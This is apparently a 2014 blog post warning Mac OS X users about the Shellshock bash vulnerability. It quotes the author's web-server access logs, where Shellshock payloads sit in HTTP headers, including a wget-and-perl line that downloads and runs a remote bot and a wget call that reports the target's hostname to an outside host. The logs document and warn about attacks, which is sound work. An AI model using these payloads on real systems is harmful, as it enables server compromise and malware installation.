Skip to the Main Content

Note:These pages make extensive use of the latest XHTML and CSS Standards. They ought to look great in any standards-compliant modern browser. Unfortunately, they will probably look horrible in older browsers, like Netscape 4.x and IE 4.x. Moreover, many posts use MathML, which is, currently only supported in Mozilla. My best suggestion (and you will thank me when surfing an ever-increasing number of sites on the web which have been crafted to use the new standards) is to upgrade to the latest version of your browser. If that's not possible, consider moving to the Standards-compliant and open-source Mozilla browser.

September 27, 2014

Shellshock and MacOSX

Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash. Apple has not, despite the fact that it uses bash as the default system shell (/bin/sh).

If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system(). Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web.

internetsurvey-3.erratasec.com - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" - - -
hosted-by.snel.com - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-" - - -
census1.shodan.io - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" "-" - - -
ec2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" -  -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/info.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - -
66.186.2.175 - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
ns2.rublevski.by - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after http://remika.ru/userfiles/file/test.php?data=golem.ph.utexas.edu\"" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:09:33 -0500] "GET /category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - -
183.16.111.67 - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -

Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.

If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.

I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.

Posted by distler at 12:58 PM | Permalink | Followups (3)